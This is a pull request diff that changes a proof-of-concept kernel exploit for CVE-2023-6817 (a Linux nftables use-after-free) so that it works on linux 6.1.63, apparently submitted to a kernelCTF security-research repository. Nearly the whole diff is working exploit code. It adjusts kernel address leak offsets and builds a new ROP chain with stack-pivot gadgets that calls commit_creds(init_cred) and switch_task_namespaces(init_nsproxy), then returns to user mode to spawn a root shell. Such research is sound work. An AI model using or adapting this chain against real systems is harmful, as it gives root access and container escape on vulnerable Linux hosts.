### PR TITLE
Modified Exploit in CVE-2023-6817 to implement stack pivoting

### DIFF
--- a/pocs/linux/kernelctf/CVE-2023-6817_lts_cos/exploit/lts-6.1.63/exploit.c
+++ b/pocs/linux/kernelctf/CVE-2023-6817_lts_cos/exploit/lts-6.1.63/exploit.c
@@ -85,7 +85,7 @@ int setup_sandbox(void) {
 }
 
 
-
+//在头和尾之间加入num个消息并发送
 void send_msg_list(struct nl_sock * socket, struct nlmsghdr **msg_list, int num){
     struct nl_msg * msg = nlmsg_alloc();
     //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
@@ -159,8 +159,8 @@ int nl_callback_leak_ops(struct nl_msg* recv_msg, void* arg)
         nla_parse_nested(tb_msg3, NFTA_SET_MAX, tb_msg2[1],NULL);
         char *val = malloc(nla_len(tb_msg3[NFTA_SET_ELEM_OBJREF]));
         nla_memcpy(val, tb_msg3[NFTA_SET_ELEM_OBJREF], nla_len(tb_msg3[NFTA_SET_ELEM_OBJREF]));
-        printf("Get ops : %llx\n", (*(uint64_t *)val)<<8);
-        leak_ops = (*(uint64_t *)val)<<8;
+        printf("Get ops : %llx\n", (*(uint64_t *)val));
+        leak_ops = (*(uint64_t *)val);
     }
     else
         printf("No NFTA_SET_ELEM_LIST_ELEMENTS\n");
@@ -355,7 +355,7 @@ void leak_and_prepare_rop(struct nl_sock *socket){
     
 
     //step 9 Spray heap
-    *(uint64_t *)&pad[0x20] = obj_a + 0x80 + 1; //because address of nft_ct_expect_obj_ops is ffffffff82b29000
+    *(uint64_t *)&pad[0x20] = obj_a + 0x80; //because address of nft_ct_expect_obj_ops is ffffffff82560960
     spray_tables(socket,0x400, pad, 0xcc);
     printf("spray finish\n");
     hash_key = 0xdeadbeef;
@@ -371,31 +371,36 @@ void leak_and_prepare_rop(struct nl_sock *socket){
     nl_recvmsgs_default(socket2);
     printf("Leak end.\n");
     printf("Start preparing ROP gadget in heap.\n");
-    kernel_off = leak_ops - 0xffffffff82b29000;
+    kernel_off = leak_ops - 0xffffffff82560960;
     char *ops = malloc(0x100);
     //ops->dump
-    *(uint64_t *)&ops[0x40] = kernel_off + 0xFFFFFFFF8165A0A3;//leave ; ret
+    *(uint64_t *)&ops[0x40] = kernel_off + 0xffffffff81a8a86f; //push rsi;jmp [rsi+0x44]
     //ops->type
-    *(uint64_t *)&ops[0x78] = kernel_off + 0xFFFFFFFF83966FA0;//last type
-    *(uint64_t *)&ops[0x08] = kernel_off + 0xffffffff8112af20;//pop rdi; ret
-    *(uint64_t *)&ops[0x10] = kernel_off + 0xFFFFFFFF83676880;//init_cred
-    *(uint64_t *)&ops[0x18] = kernel_off + 0xFFFFFFFF811BB3F0;//commit_creds;
-    *(uint64_t *)&ops[0x20] = kernel_off + 0xffffffff8111215f;//pop rdi ; pop r14 ; pop r13 ; pop r12 ; pop rbp ; pop rbx ; ret
+    *(uint64_t *)&ops[0x78] = kernel_off + 0xffffffff82e217c0;//last type
+    //*(uint64_t *)&ops[0x0] = obj_a+0x100000;
+    *(uint64_t *)&ops[0x08] = kernel_off + 0xffffffff810ba630;//pop rdi; ret
+    *(uint64_t *)&ops[0x10] = kernel_off + 0xffffffff82a8c8c0;//init_cred
+    *(uint64_t *)&ops[0x18] = kernel_off + 0xffffffff811025a0;//commit_creds;
+    *(uint64_t *)&ops[0x20] = kernel_off + 0xffffffff810ba630;//pop rdi; ret
     *(uint64_t *)&ops[0x28] = 1;
-    *(uint64_t *)&ops[0x58] = kernel_off + 0xFFFFFFFF811B1DD0;//find_task_by_vpid
-    *(uint64_t *)&ops[0x60] = kernel_off + 0xffffffff810d4f11;//mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret
-    *(uint64_t *)&ops[0x68] = 0;
-    *(uint64_t *)&ops[0x70] = kernel_off + 0xFFFFFFFF81112167;//pop rbx ; ret ; because ops->0x78 is the last_type
-    *(uint64_t *)&ops[0x80] = kernel_off + 0xFFFFFFFF81841C4E;//pop rsi ; ret
-    *(uint64_t *)&ops[0x88] = kernel_off + 0xFFFFFFFF83676640;//init_nsproxy
-    *(uint64_t *)&ops[0x90] = kernel_off + 0xFFFFFFFF811B9860;//switch_task_namespaces
-    *(uint64_t *)&ops[0x98] = kernel_off + 0xFFFFFFFF82167E16;//swapgs; ret
-    *(uint64_t *)&ops[0xa0] = kernel_off + 0xFFFFFFFF822011D7;//iretq
-    *(uint64_t *)&ops[0xa8] = (uint64_t)shell;
-    *(uint64_t *)&ops[0xb0] = user_cs;
-    *(uint64_t *)&ops[0xb8] = user_rflags;
-    *(uint64_t *)&ops[0xc0] = user_rsp|8;
-    *(uint64_t *)&ops[0xc8] = user_ss;
+    *(uint64_t *)&ops[0x30] = kernel_off + 0xffffffff810ba62d;//pop r12; pop r15; ret
+    *(uint64_t *)&ops[0x48] = kernel_off + 0xffffffff81000743;//ret
+    *(uint64_t *)&ops[0x50] = kernel_off + 0xffffffff810f80b0;//find_task_by_vpid
+    *(uint64_t *)&ops[0x58] = kernel_off + 0xffffffff81eee9ad;//push rax;pop rdi;ret
+    *(uint64_t *)&ops[0x60] = kernel_off + 0xffffffff81000743;//ret
+    *(uint64_t *)&ops[0x68] = kernel_off + 0xffffffff81000743;//ret
+    *(uint64_t *)&ops[0x70] = kernel_off + 0xffffffff8115583e;//pop rsi ; ret ; because ops->0x78 is the last_type
+    *(uint64_t *)&ops[0x80] = kernel_off + 0xffffffff8115583e;//pop rsi ; ret
+    *(uint64_t *)&ops[0x88] = kernel_off + 0xffffffff82a8c680;//init_nsproxy
+    *(uint64_t *)&ops[0x90] = kernel_off + 0xffffffff811005d0;//switch_task_namespaces
+    *(uint64_t *)&ops[0x98] = kernel_off + 0xffffffff82001166;//swapgs_restore_regs_and_return_to_usermode + 54
+    *(uint64_t *)&ops[0xa0] = 0;
+    *(uint64_t *)&ops[0xa8] = 0;
+    *(uint64_t *)&ops[0xb0] = (uint64_t)shell;
+    *(uint64_t *)&ops[0xb8] = user_cs;
+    *(uint64_t *)&ops[0xc0] = user_rflags;
+    *(uint64_t *)&ops[0xc8] = user_rsp|8;
+    *(uint64_t *)&ops[0xd0] = user_ss;
     //step 11
     //free the last object.
     for(i=0;i<0x40;i++){
@@ -422,9 +427,8 @@ void jmp_rop(struct nl_sock * socket){
     new_table(socket, table);
     cur_handle = 0;
     new_chain(socket, table, target_chain, 0);
-    
     new_set_pipapo_for_poc_chain(socket, table, pipapo_set, 0x40);
-    new_set_hashtable_with_elemdata(socket, table, hash_set_for_expr, 0x30, 0x10);
+    new_set_hashtable_with_elemdata(socket, table, hash_set_for_expr, 0x30, 0x18);
 
     nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_setelem, NULL);
     
@@ -437,7 +441,6 @@ void jmp_rop(struct nl_sock * socket){
     char *key_end = malloc(0x40);
     char *hash_key_48 = malloc(48);
     memset(hash_key_48, 0, 48);
-    
     for(i=0;i<0x20;i++){
     	memset(key,i,0x40);
 	memset(key_end,i,0x40);
@@ -447,26 +450,26 @@ void jmp_rop(struct nl_sock * socket){
     for(i=0;i<0x20;i++){
     	primitive_1(socket, table, target_chain);
     }
-    
     //step 3 delete target chain
     del_chain(socket, table, target_chain);
     sleep(5);
     //step 4 create normal set elem with expr, make offsetof(chain->use) == offsetof(expr->size)
     *(uint64_t *)&pad[0] = target_heap;//expr->ops
-    *(uint64_t *)&pad[8] = kernel_off + 0xFFFFFFFF8165A0A3;//leave ; ret
+    *(uint64_t *)&pad[0x8] = target_heap;//expr->ops
+    *(uint64_t *)&pad[0x10] = kernel_off + 0xffffffff813674c4;//leave;ret
     for(i=0;i<0x1000;i++){
     	*(uint64_t *)hash_key_48 = i;
-	new_setelem_with_expr_and_elemdata(socket, table, hash_set_for_expr, pad, 0x10, NULL, hash_key_48, 48, NULL, 0);
+        *(uint64_t *)(hash_key_48 + 0x10) = kernel_off + 0xffffffff81098165;//pop rsp; pop rbp; pop rbx; ret
+	new_setelem_with_expr_and_elemdata(socket, table, hash_set_for_expr, pad, 0x18, NULL, hash_key_48, 48, NULL, 0);
     }
-    
     
     //step 5 flush set to change the expr->size;
     elem_flush(socket, table, pipapo_set);
-    
     //step 6 jmp to ROP;
      
     for(i=0;i<0x800;i++){
         *(uint64_t *)hash_key_48 = i;
+        *(uint64_t *)(hash_key_48 + 0x10) = kernel_off + 0xffffffff81098165;//pop rsp; pop rbp; pop rbx; ret
         get_setelem(socket, table, hash_set_for_expr, hash_key_48,48);
     }
     


### PR DESCRIPTION
The original exp can not successfully pivot stack like [Modified Exploit in CVE-2023-6817 to implement stack pivoting #183](https://github.com/google/security-research/pull/183). So I modified this exp using my linux-v6.1.63 gadget